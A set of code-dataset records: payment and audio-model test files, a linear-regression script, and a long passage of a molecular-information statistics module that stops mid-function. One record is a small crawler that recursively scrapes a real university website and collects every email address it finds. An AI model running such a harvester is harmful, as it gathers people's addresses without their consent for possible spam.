PaymentTransaction.objects.filter(charge_id=result.charge_id).first()\n assert retrieved_transaction.charge_id == result.charge_id\n assert retrieved_transaction.transaction_amount == Decimal(\"1.00\")\n\n def test_authorize_payment_card(self):\n payment = test_objects.payment(\"4000000000000077\")\n payment_description = \"Test Payment\"\n amount = Money(Decimal(\"1.05\"), \"USD\")\n\n result = payment_service.authorize_payment(amount, payment, payment_description)\n assert result.charge_id is not None\n assert result.payment_token is not None\n assert result.payment_token.startswith(\"tok_\")\n assert result.transaction_amount == Decimal(\"1.05\")\n\n def test_invalid_payment(self):\n payment = test_objects.payment(\"4000000000000002\") # Card fails\n payment_description = \"Failing Payment\"\n amount = Money(Decimal(\"1.10\"), \"USD\")\n\n with pytest.raises(PaymentException) as e:\n payment_service.authorize_payment(amount, payment, payment_description)\n\n assert e.value.error_type == SubmitErrorType.PAYMENT_DECLINED\n assert \"Your card was declined\" in e.value.detail\n","sub_path":"api/tests/integration/test_payment_service.py","file_name":"test_payment_service.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"455920056","text":"import pytorch_lightning as pl\nimport torch\n\nfrom pyannote.audio.models.segmentation.debug import SimpleSegmentationModel\nfrom pyannote.audio.tasks import SpeakerTracking, VoiceActivityDetection\nfrom pyannote.database import FileFinder, get_protocol\n\n\ndef setup_tasks(task):\n protocol = get_protocol(\n \"Debug.SpeakerDiarization.Debug\", preprocessors={\"audio\": FileFinder()}\n )\n vad = task(protocol, duration=0.2, batch_size=32, num_workers=4)\n return protocol, vad\n\n\ndef create_dl(model, task):\n m = model(task=task)\n task.setup(\"fit\")\n m.setup(\"fit\")\n return task.train_dataloader()\n\n\ndef get_next5(dl):\n last5 = []\n it = iter(dl)\n for i in range(5):\n last5.append(next(it))\n return last5\n\n\ndef test_seeding_ensures_data_loaders():\n \"Setting a global seed for the dataloaders ensures that we get data back in the same order\"\n pl.seed_everything(1)\n\n for task in [VoiceActivityDetection, SpeakerTracking]:\n protocol, vad = setup_tasks(task)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5a = get_next5(dl)\n\n protocol, vad = setup_tasks(task)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5b = get_next5(dl)\n\n for i in range(len(last5b)):\n assert torch.equal(last5a[i][\"X\"], last5b[i][\"X\"])\n\n\ndef test_different_seeds():\n \"Changing the global seed will change the order of the data that loads\"\n\n for task in [VoiceActivityDetection, SpeakerTracking]:\n protocol, vad = setup_tasks(task)\n pl.seed_everything(4)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5a = get_next5(dl)\n\n protocol, vad = setup_tasks(task)\n pl.seed_everything(5)\n dl = create_dl(SimpleSegmentationModel, vad)\n last5b = get_next5(dl)\n\n for i in range(5):\n assert not torch.equal(last5a[i][\"X\"], last5b[i][\"X\"])\n","sub_path":"tests/tasks/test_reproducibility.py","file_name":"test_reproducibility.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"184135667","text":"import re\nimport requests\n\nsiteUrl = 'http://www.csd.tsu.ru'\n\nn = 3\nuniqEmails = set()\nuniqUrls = set()\n\ndef emailSearch(url, depth):\n\tif depth <= n:\n\t\ttry:\n\t\t\trequest = requests.get(url)\n\t\texcept:\n\t\t\treturn\n\t\tcurrEmails=re.findall(r'[a-z][\\w]*[@][a-z][\\w]*[\\.][a-z][\\w|.]*', request.text)\n\t\tfor em in currEmails:\n\t\t\tuniqEmails.add(em)\n\n\t\tabsUrl=re.findall(r'href=\"(http?:\\/\\/[\\w\\/\\.]*)\"', request.text)\n\t\trelUrl=re.findall(r'href=[\\\"\\'](.*?)[\\\"\\']', request.text)\n\t\tfor url in absUrl:\n\t\t\tif url not in uniqUrls:\n\t\t\t\tuniqUrls.add(url)\n\t\t\t\temailSearch(url, depth + 1)\n\n\t\tfor url in relUrl:\n\t\t\tif url not in uniqUrls:\n\t\t\t\tuniqUrls.add(url)\n\t\t\t\temailSearch(url, depth + 1)\n\n\n\nemailSearch(siteUrl, 1)\nprint('result: ')\nprint(uniqEmails)\n","sub_path":"python/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"450614468","text":"import numpy as np\nimport time\n\n# 分训练集和测试集 进行训练\ndata = np.loadtxt(\"cars-train.csv\",delimiter=\",\")\nm1 = 1\nm2 = 1\nb = 1\nweight = np.array([\n [m1],\n [m2],\n [b],\n])\nfeature = data[:,0:2] # 保留了维度信息的feature\nfeatureMatrix = np.append(feature, np.ones(shape=(len(feature), 1)),axis=1)\nlabel = np.expand_dims(data[:, -1], axis=1) # 保留了维度信息的label\nlearningRate = 0.00001\n\n#梯度下降的函数\ndef grandentdecent():\n result = np.dot(featureMatrix.T,np.dot(featureMatrix,weight) - label)/len(featureMatrix)*2\n return result #结果矩阵 第0行第0列是对m的偏导,第0行第1列是对b的偏导\n#训练\ndef train():\n startTime = time.time()\n for i in range(1,10000000):\n result = grandentdecent()\n # print(result)\n global weight\n weight = weight - result*learningRate\n if (abs(result[0][0])<0.5 and abs(result[1][0])<0.5 and abs(result[2][0])<0.5):\n break\n endTime = time.time()\n print(\"weight={}\".format(weight))\n print(\"消耗的时间={}\".format(endTime-startTime))\n\n\nif __name__ == '__main__':\n train()\n\n# weight=[[-0.1025721 ]\n# [-4.27357477]\n# [40.29786641]]\n# 消耗的时间=27.391464710235596\n","sub_path":"matrix/linearRegression4.py","file_name":"linearRegression4.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"49479922","text":"# -*- coding: utf-8 -*-\n\"\"\"This module contains classes for calculating functional molecular information statistics.\n\n\"\"\"\nfrom collections import Counter, defaultdict\nfrom multiprocessing import Pool\nfrom operator import itemgetter\nfrom string import Template\nfrom ast import literal_eval as make_tuple\nimport bisect\nimport copy\nimport pkgutil\nimport itertools\nimport sys\nimport numpy as np\nfrom pandas.io.formats.format import return_docstring\n\nimport nsb_entropy as nb\n# import tsfm.nsb_entropy as nb\nimport random\nimport time\nimport math as mt\nimport exact as exact\n# import tsfm.exact as exact\nimport glob\nimport re\nimport statsmodels.stats.multitest as smm\nimport pandas as pd\n\n\nclass DistanceCalculator:\n \"\"\"A `DistanceCalculator` object contains methods for calculating several pairwise distance metrics between function logos.\n \n Currently, a `DistanceCalculator` object can calculate pairwise distance using the square-root of the Jensen-Shannon\n divergence and will print the resulting distance matrix to stdout.\n\n Args:\n distance (str): Indicates which distance metric to use for pairwise calculations.\n\n Attributes:\n distanceMetric (str): Indicates the distance metric to be used in \n pairwise calculations.\n featureSet (:obj:`set` of :obj:`str`): A :obj:`set` of the structural \n features contained in the function logos being compared (e.g. 1A, 173AU).\n functionSet (:obj:`set` of :obj:`str`): A :obj:`set` of the functional \n classes contained in the function logos being compared.\n\n Example::\n \n x = tsfm.MolecularInformation.DistanceCalculator('jsd')\n x.get_distance(function_logos)\n\n \"\"\"\n\n def __init__(self, distance):\n \"\"\"The initialization of a `DistanceCalculator` object requires a :str: indicating the distance metric to be used.\n\n \"\"\"\n self.distanceMetric = distance\n self.featureSet = set()\n self.functionSet = set()\n\n def get_distance(self, ResultsDict):\n \"\"\"\n Prints a pairwise distance matrix using the distance metric indicated during instantiation to file. \n\n Args:\n ResultsDict (:obj:`dict` of :obj:`str` mapping to :class:`FunctionLogoResults`):\n The values of the :obj:`dict` are compared using the selected pairwise\n distance metric.\n \n \n Note:\n Creates a :obj:`dict` of :obj:`str`: :class:`pandas.DataFrame` from \n :obj:`ResultsDict`. The index of the dataframes are the union \n of the structural features contained in :obj:`ResultsDict`, \n and columns labels are the union of the functional classes contained in \n :obj:`ResultsDict` including a column containing \n the functional information of the feature measured in bits. \n Rows contain the Gorodkin fractional heights of each functional \n class of each feature along with the functional information of the \n feature measured in bits. The fractional heights of \n each row is normalized to account for filtering of data and rounding \n errors. The :obj:`dict` of :obj:`str`: :obj:`pandas.DataFrame` is \n passed to the distance method set when the :class:`DistanceCalculator` \n was instantiated. 
Below is an example of the :class:`pandas.DataFrame` \n created\\:\n \n +--------+-------+-------+-------+-------+-------+-------+--------+\n | | A | C | D | E | F | E | bits |\n +========+=======+=======+=======+=======+=======+=======+========+\n | 1A | 0.500 | 0.250 | 0.125 | 0.000 | 0.000 | 0.125 | 2.453 |\n +--------+-------+-------+-------+-------+-------+-------+--------+\n | 1U | 0.000 | 0.250 | 0.125 | 0.500 | 0.125 | 0.000 | 2.453 |\n +--------+-------+-------+-------+-------+-------+-------+--------+\n\n \"\"\"\n for result in ResultsDict:\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].info):\n for pairtype in ResultsDict[result].info[coord]:\n self.featureSet.add(\"{}{}\".format(\"\".join(str(i) for i in coord), pairtype))\n for function in ResultsDict[result].height[coord][pairtype]:\n self.functionSet.add(function)\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].info):\n for base in ResultsDict[result].info[coord]:\n self.featureSet.add(\"{}{}\".format(coord, base))\n for function in ResultsDict[result].height[coord][base]:\n self.functionSet.add(function)\n\n # add inverse info features\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].inverseInfo):\n for pairtype in ResultsDict[result].inverseInfo[coord]:\n self.featureSet.add(\"i{}{}\".format(\"\".join(str(i) for i in coord), pairtype))\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].inverseInfo):\n for base in ResultsDict[result].inverseInfo[coord]:\n self.featureSet.add(\"i{}{}\".format(coord, base))\n\n # remove features that contain gaps\n self.featureSet = {feature for feature in self.featureSet if not \"-\" in feature}\n\n # prepare pandas dataframes for each result object\n functionDict = {}\n pandasDict = {}\n for function in self.functionSet:\n functionDict[function] = np.zeros(len(self.featureSet), )\n functionDict[\"bits\"] = np.zeros(len(self.featureSet), )\n\n for result in ResultsDict:\n pandasDict[result] = pd.DataFrame(functionDict, index=self.featureSet)\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].info):\n for pairtype in [pair for pair in ResultsDict[result].info[coord] if not \"-\" in pair]:\n row = \"{}{}\".format(\"\".join(str(i) for i in coord), pairtype)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].info[coord][pairtype]\n for function in ResultsDict[result].height[coord][pairtype]:\n pandasDict[result].loc[row, function] = ResultsDict[result].height[coord][pairtype][\n function]\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].info):\n for base in [nuc for nuc in ResultsDict[result].info[coord] if not nuc == \"-\"]:\n row = \"{}{}\".format(coord, base)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].info[coord][base]\n for function in ResultsDict[result].height[coord][base]:\n pandasDict[result].loc[row, function] = ResultsDict[result].height[coord][base][function]\n\n for coord in ResultsDict[result].basepairs:\n if (coord in ResultsDict[result].inverseInfo):\n for pairtype in [pair for pair in ResultsDict[result].inverseInfo[coord] if not \"-\" in pair]:\n row = \"i{}{}\".format(\"\".join(str(i) for i in coord), pairtype)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].inverseInfo[coord][pairtype]\n for function in ResultsDict[result].inverseHeight[coord][pairtype]:\n pandasDict[result].loc[row, function] = 
ResultsDict[result].inverseHeight[coord][pairtype][\n function]\n\n for coord in range(ResultsDict[result].pos):\n if (coord in ResultsDict[result].inverseInfo):\n for base in [nuc for nuc in ResultsDict[result].inverseInfo[coord] if not nuc == \"-\"]:\n row = \"i{}{}\".format(coord, base)\n pandasDict[result].loc[row, \"bits\"] = ResultsDict[result].inverseInfo[coord][base]\n for function in ResultsDict[result].inverseHeight[coord][base]:\n pandasDict[result].loc[row, function] = ResultsDict[result].inverseHeight[coord][base][\n function]\n\n # normalize heights to equal one after possible removal of CIFs based on some criteria\n for frame in pandasDict:\n pandasDict[frame] = pandasDict[frame].round(3)\n heights = pandasDict[frame].columns.drop('bits')\n pandasDict[frame][heights] = pandasDict[frame][heights].div(pandasDict[frame][heights].sum(axis=1), axis=0)\n\n if (self.distanceMetric == \"jsd\"):\n self.rJSD(pandasDict)\n\n def rJSD(self, pandasDict):\n \"\"\"\n Produces pairwise comparisons using rJSD metric\n\n This method should not be called directly. Instead use the\n :meth:`get_distance`. All pairwise comparisons of OTUs are produced\n and :meth:`rJSD_distance` is called to do the calculations.\n\n Args:\n pandasDict (:obj:`dict` of `str` mapping to :class:`pandas.DataFrame`): \n See :meth:`get_distance` for the format of the Data Frames.\n \"\"\"\n pairwise_combinations = itertools.permutations(pandasDict.keys(), 2)\n jsdDistMatrix = pd.DataFrame(index=list(pandasDict.keys()), columns=list(pandasDict.keys()))\n jsdDistMatrix = jsdDistMatrix.fillna(0)\n for pair in pairwise_combinations:\n distance = 0\n for i, row in pandasDict[pair[0]].iterrows():\n if (row['bits'] == 0 and pandasDict[pair[1]].loc[i, 'bits'] == 0):\n continue\n else:\n distance += self.rJSD_distance(row.drop('bits').to_numpy(),\n pandasDict[pair[1]].loc[i,].drop('bits').to_numpy(),\n row['bits'], pandasDict[pair[1]].loc[i, 'bits'])\n\n jsdDistMatrix.loc[pair[0], pair[1]] = distance\n\n jsdDistMatrix = jsdDistMatrix.round(6)\n jsdDistMatrix.to_csv(\"jsdDistance.matrix\", sep=\"\\t\")\n\n def entropy(self, dist):\n return np.sum(-dist[dist != 0] * np.log2(dist[dist != 0]))\n\n def rJSD_distance(self, dist1, dist2, pi1, pi2):\n r\"\"\"\n Weighted square root of the generalized Jensen-Shannon divergence defined by Lin 1991\n\n .. math:: \n \n D(X,Y) \\equiv \\sum_{f \\in F} (I_f^X + I_f^Y) \\sqrt{H[\\pi_f^X p_f^X + \\pi_f^Y p_f^Y] - (\\pi_f^X H[p_f^X] + \\pi_f^Y H[p_f^Y])}\n\n where :math:`\\pi_f^X = \\frac{I_f^X}{I_f^X + I_f^Y}` and :math:`\\pi_f^Y = \\frac{I_f^Y}{I_f^X + I_f^Y}`\n\n \"\"\"\n step = self.entropy(pi1 * dist1 + pi2 * dist2) - (pi1 * self.entropy(dist1) + pi2 * self.entropy(dist2))\n return (pi1 + pi2) * mt.sqrt(step if step >= 0 else 0)\n\n\nclass FunctionLogoResults:\n \"\"\"\n Stores results from information calculations and provides methods for text output and visualization.\n\n Args:\n name (:obj:`str`): Value is used as prefix for output files.\n basepairs (:obj:`list` of :obj:`tuples` of (:obj:`int`, :obj:`int`)):\n a list of basepair coordinates encoded as a :obj:`tuple` of two \n :obj:`int`. \n \n Note:\n This data structure is created as an attribute of \n :class:`FunctionLogo` during instantiation and can be accessed\n with :attr:`FunctionLogo.basepairs` or created during\n instantiation of this class when ``from_file = True``\n pos (:obj:`int`): Stores length of the alignment.\n \n Note:\n See note for :attr:`basepairs`. 
Accessed using :attr:`FunctionLogo.pos`.\n sequences (:obj:`list` of :class:`Seq`): a list of :class:`Seq` objects \n used for text output and visualization.\n\n Note:\n See note for :attr:`basepairs`. Accessed using :attr:`FunctionLogo.seq`\n pairs (:obj:`set` of :obj:`str`): unique basepair states found in the dataset.\n\n Note: \n See note for :attr:`basepairs`.\n singles (:obj:`set` of :obj:`str`): unique states for single sites.\n \n Note:\n See note for :attr:`basepairs`.\n \n info (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n height (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n inverseInfo (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features to information content for anti-determinants. Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`.\n inverseHeight (:obj:`dict` of :obj:`int` or :obj:`tuple` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`dict` of :obj:`str` mapping to :obj:`float`):\n mapping of structural features and functional class to class height for anti-determinants. 
Add this data structure using :meth:`add_information`.\n\n Note:\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`.\n p (:obj:`dict` of :obj:`str` mapping to :obj:`dict`): mapping of structural features and class height to p-values.\n \n Note:\n This data structure is created using :meth:`add_stats()`\n inverse_p (:obj:`dict` of :obj:`str` mapping to :obj:`dict`): mapping of structural features and class height to p-values for anti-determinants\n \n Note:\n This data structure is created using :meth:`add_stats()`\n from_file (:obj:`bool`): create :class:`FunctionLogoResults` \n object from file written with \n :meth:`FunctionLogoResults.text_output`\n \n \"\"\"\n\n def __init__(self, name, basepairs=None, pos=0, sequences=None, pairs=None, singles=None, info=None,\n height=None, inverseInfo=None, inverseHeight=None, p=None,\n inverse_p=None, from_file=False):\n self.pos = pos\n self.correction = \"\"\n if (not info):\n self.info = defaultdict(lambda: defaultdict(float))\n self.height = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n else:\n self.info = info\n self.height = height\n\n if (not inverseInfo):\n self.inverseInfo = defaultdict(lambda: defaultdict(float))\n self.inverseHeight = defaultdict(lambda: defaultdict(lambda: defaultdict(float)))\n else:\n self.inverseInfo = inverseInfo\n self.inverseHeight = inverseHeight\n\n if (not p):\n self.p = {'P': defaultdict(lambda: defaultdict(float)),\n 'p': defaultdict(lambda: defaultdict(lambda: defaultdict(float))),\n 'P_corrected': defaultdict(lambda: defaultdict(float)),\n 'p_corrected': defaultdict(lambda: defaultdict(lambda: defaultdict(float)))}\n else:\n self.p = p\n\n if (not inverse_p):\n self.inverse_p = {'P': defaultdict(lambda: defaultdict(float)),\n 'p': defaultdict(lambda: defaultdict(lambda: defaultdict(float))),\n 'P_corrected': defaultdict(lambda: defaultdict(float)),\n 'p_corrected': defaultdict(lambda: defaultdict(lambda: defaultdict(float)))}\n else:\n self.inverse_p = inverse_p\n\n if (not basepairs):\n self.basepairs = []\n else:\n self.basepairs = basepairs\n if (not sequences):\n self.sequences = []\n else:\n self.sequences = sequences\n\n if (not pairs):\n self.pairs = set()\n else:\n self.pairs = pairs\n\n if (not singles):\n self.singles = set()\n else:\n self.singles = singles\n\n if (from_file):\n self.name = name.split(\"/\")[-1]\n self.from_file(name)\n else:\n self.name = name\n\n def from_file(self, file_name):\n \"\"\"\n Read previously calculated results from file.\n\n Populates :class:`FunctionLogoResults` from previously calculated \n results written to a file using :meth:`text_output`. 
\n\n Args:\n file_name (:obj:`str`): File path of previously calculated results\n \"\"\"\n pvalue = False\n file_handle = open(file_name, \"r\")\n for line in file_handle:\n if (line.startswith(\"#\")):\n if (\"p-value\" in line):\n pvalue = True\n else:\n line = line.strip()\n spline = line.split(\"\\t\")\n if (spline[0] == \"bp:\"):\n if (not make_tuple(spline[1]) in self.basepairs):\n self.basepairs.append(make_tuple(spline[1]))\n self.pairs.add(spline[2])\n self.info[make_tuple(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.p['P'][make_tuple(spline[1])][spline[2]] = float(spline[5])\n self.p['P_corrected'][make_tuple(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.height[make_tuple(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.p['p'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.p['p_corrected'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"ss:\"):\n if (self.pos < int(spline[1])):\n self.pos = int(spline[1])\n self.singles.add(spline[2])\n self.info[int(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.p['P'][int(spline[1])][spline[2]] = float(spline[5])\n self.p['P_corrected'][int(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.height[int(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.p['p'][int(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.p['p_corrected'][int(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"ibp:\"):\n if (not make_tuple(spline[1]) in self.basepairs):\n self.basepairs.append(make_tuple(spline[1]))\n self.pairs.add(spline[2])\n self.inverseInfo[make_tuple(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.inverse_p['P'][make_tuple(spline[1])][spline[2]] = float(spline[5])\n self.inverse_p['P_corrected'][make_tuple(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.inverseHeight[make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[1])\n if (pvalue):\n self.inverse_p['p'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[2])\n self.inverse_p['p_corrected'][make_tuple(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n elif (spline[0] == \"iss:\"):\n if (self.pos < int(spline[1])):\n self.pos = int(spline[1])\n self.singles.add(spline[2])\n self.inverseInfo[int(spline[1])][spline[2]] = float(spline[4])\n if (pvalue):\n self.inverse_p['P'][int(spline[1])][spline[2]] = float(spline[5])\n self.inverse_p['P_corrected'][int(spline[1])][spline[2]] = float(spline[6])\n for function in spline[7].split():\n function_split = function.split(\":\")\n self.inverseHeight[int(spline[1])][spline[2]][function_split[0]] = float(function_split[1])\n if (pvalue):\n self.inverse_p['p'][int(spline[1])][spline[2]][function_split[0]] = float(function_split[2])\n self.inverse_p['p_corrected'][int(spline[1])][spline[2]][function_split[0]] = float(\n function_split[3])\n self.pos += 1 # fix off by one\n file_handle.close()\n\n def add_information(self, info, height, inverse=False):\n \"\"\"\n Add data structures containing results from information calculations\n\n This method is used to 
add results from \n :meth:`FunctionLogo.calculate_entropy_NSB()`, \n :meth:`FunctionLogo.calculate_entropy_MM()`,\n :meth:`FunctionLogo.calculate_entropy_inverse_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_inverse_MM()`. If reading previous\n results from a file this method is unnecessary because these data structures\n are populated from values in the file.\n\n Args:\n info (:obj:`dict`): mapping of structural features to information \n content. This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n height (:obj:`dict`): mapping of structural features and functional class to class height.\n This data structure is output of \n :meth:`FunctionLogo.calculate_entropy_NSB()` or \n :meth:`FunctionLogo.calculate_entropy_MM()`.\n inverse (:obj:`bool`): Defines if the data structures are for\n anti-determinants.\n \"\"\"\n if (inverse):\n self.inverseInfo = info\n self.inverseHeight = height\n else:\n self.info = info\n self.height = height\n\n def add_stats(self, distribution, correction, inverse=False):\n \"\"\"\n Perform statistical testing and multiple test correction\n\n Calculates p-values and multiple testing corrected p-values for\n structural features and functional class heights. Requires an\n instance of :class:`FunctionLogoDist` and calls the \n :meth:`FunctionLogoDist.stat_test`. Methods for multiple test\n correction are provided by :class:`statsmodels.stats.multitest`.\n\n Args:\n distribution (:class:`FunctionLogoDist`): discrete probability \n distributions of information content of structural \n features and functional class height.\n correction (:obj:`str`): Multiple test correction method.\n inverse (:obj:`bool`): Produce statistical tests for\n anti-determinants.\n \"\"\"\n self.correction = correction\n if (inverse):\n self.inverse_p = distribution.stat_test(self.inverseInfo, self.inverseHeight,\n correction)\n else:\n self.p = distribution.stat_test(self.info, self.height, correction)\n\n def get(self, position, state):\n ret_counter = Counter()\n if (len(position) == 1):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0]):\n ret_counter[x.function] += 1\n if (len(position) == 2):\n for x in self.sequences:\n if (x.seq[position[0]] == state[0] and x.seq[position[1]] == state[1]):\n ret_counter[x.function] += 1\n\n return ret_counter\n\n def text_output(self):\n \"\"\"\n Write results to file named\\: :attr:`name`\\_results.txt\n \"\"\"\n # build output heading\n file_handle = open(\"{}_results.txt\".format(self.name.split(\"/\")[-1]), \"w\")\n heading_dict = {}\n if (self.p):\n heading_dict['P'] = \"\\tp-value\\t{}\".format(self.correction)\n heading_dict['p'] = \"\\tclass:height:p-value:{}\".format(self.correction)\n else:\n heading_dict['P'] = \"\"\n heading_dict['p'] = \"\\tclass:height\"\n\n print(\"#bp\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in self.info):\n for pairtype in sorted(self.info[coord]):\n output_string = \"bp:\\t{}\".format(coord)\n output_string += \"\\t{}\\t{}\\t{:05.3f}\\t\".format(pairtype, sum(self.get(coord, pairtype).values()),\n self.info[coord][pairtype])\n if (self.p):\n output_string += \"{:08.6f}\".format(self.p['P'][coord][pairtype])\n output_string += \"\\t{:08.6f}\".format(self.p['P_corrected'][coord][pairtype])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.height[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n 
output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.p['p'][coord][pairtype][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.p['p_corrected'][coord][pairtype][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n if (self.inverseInfo):\n print(\"#ibp\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in sorted(self.basepairs, key=itemgetter(0)):\n if (coord in self.inverseInfo):\n for pairtype in sorted(self.inverseInfo[coord]):\n output_string = \"ibp:\\t{}\".format(coord)\n output_string += \"\\t{}\\t{}\\t{:05.3f}\\t\".format(pairtype, sum(self.get(coord, pairtype).values()),\n self.inverseInfo[coord][pairtype])\n if (self.p):\n output_string += \"{:08.6f}\".format(self.inverse_p['P'][coord][pairtype])\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P_corrected'][coord][pairtype])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.inverseHeight[coord][pairtype].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.inverse_p['p'][coord][pairtype][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.inverse_p['p_corrected'][coord][pairtype][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n print(\"#ss\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in range(self.pos):\n if (coord in self.info):\n for base in sorted(self.info[coord]):\n output_string = \"ss:\\t{}\\t{}\\t{}\\t{:05.3f}\".format(coord, base,\n sum(self.get([coord], base).values()),\n self.info[coord][base])\n if (self.p):\n output_string += \"\\t{:08.6f}\".format(self.p['P'][coord][base])\n output_string += \"\\t{:08.6f}\".format(self.p['P_corrected'][coord][base])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.height[coord][base].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.p['p'][coord][base][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(self.p['p_corrected'][coord][base][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n\n if (self.inverseInfo):\n print(\"#iss\\tcoord\\tstate\\tN\\tinfo{P}{p}\".format(**heading_dict), file=file_handle)\n for coord in range(self.pos):\n if (coord in self.inverseInfo):\n for base in sorted(self.inverseInfo[coord]):\n output_string = \"iss:\\t{}\\t{}\\t{}\\t{:05.3f}\".format(coord, base,\n sum(self.get([coord], base).values()),\n self.inverseInfo[coord][base])\n if (self.p):\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P'][coord][base])\n output_string += \"\\t{:08.6f}\".format(self.inverse_p['P_corrected'][coord][base])\n\n output_string += \"\\t\"\n for aainfo in sorted(self.inverseHeight[coord][base].items(), key=itemgetter(1), reverse=True):\n output_string += \"{}:{:05.3f}\".format(aainfo[0], aainfo[1])\n if (self.p):\n output_string += \":{:08.6f}\".format(self.inverse_p['p'][coord][base][aainfo[0].upper()])\n output_string += \":{:08.6f}\".format(\n self.inverse_p['p_corrected'][coord][base][aainfo[0].upper()])\n output_string += \" \"\n\n print(output_string, file=file_handle)\n file_handle.close()\n\n def logo_output_idLogo(self):\n coord_length = 0 # used to determine eps height\n coord_length_addition = 
